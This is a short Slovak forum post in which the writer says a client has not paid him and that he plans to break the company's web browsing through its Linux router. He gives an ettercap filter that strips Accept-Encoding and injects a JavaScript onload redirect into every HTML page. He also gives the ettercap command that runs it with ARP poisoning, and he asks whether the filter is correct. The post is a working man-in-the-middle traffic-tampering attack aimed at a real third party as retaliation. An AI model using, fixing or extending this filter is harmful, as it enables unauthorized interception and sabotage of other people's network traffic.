Potrebujem spravit redirect http traficu u jednej neplatiacej firmy. Nastastie pre mna im ide cely trafic cez linux router, takze som sa rozhodol v prvom kole im znefunkcnit prehliace redirectom celeho http traficu.

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("changed Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<BODY", "&#x000D<BODY onload=\"javascript:document.location.href='ip routra'\"><XSS a=");
replace("<body", "&#x000D<body onload=\"javascript:document.location.href='ip routra'\"><XSS a=");
msg("Filter Ran.\n");
}

Nakolko som rodeny antikoder a s ettercapom som sa hral naposledy pred 9-10 rokmi asi nie som si isty spravnostou filtra a jeho naslednym pouzitim.

Este doplnim, vytvoreny filter som "skompiloval" do tvaru zrozumitelneho ettercapu a spustil samotny ettercap.

ettercap -T -Q -M arp:remote // // -F /etc/filter.ef